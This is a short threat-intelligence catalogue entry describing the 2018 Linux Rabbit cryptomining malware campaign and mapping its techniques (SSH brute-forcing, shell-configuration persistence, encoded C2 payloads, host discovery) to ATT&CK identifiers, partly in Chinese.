Linux Rabbit
Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[1]
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1546 | .004 | 事件触发执行: Unix Shell Configuration Modification |
Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files. [1] |
| Enterprise | T1133 | 外部远程服务 |
Linux Rabbit attempts to gain access to the server via SSH.[1] |
|
| Enterprise | T1132 | 数据编码 |
Linux Rabbit sends the payload from the C2 server as an encoded URL parameter. [1] |
|
| Enterprise | T1110 | .003 | 暴力破解: Password Spraying |
Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server. [1] |
| Enterprise | T1078 | 有效账户 |
Linux Rabbit acquires valid SSH accounts through brute force. [1] |
|
| Enterprise | T1033 | 系统所有者/用户发现 |
Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. [1] |
|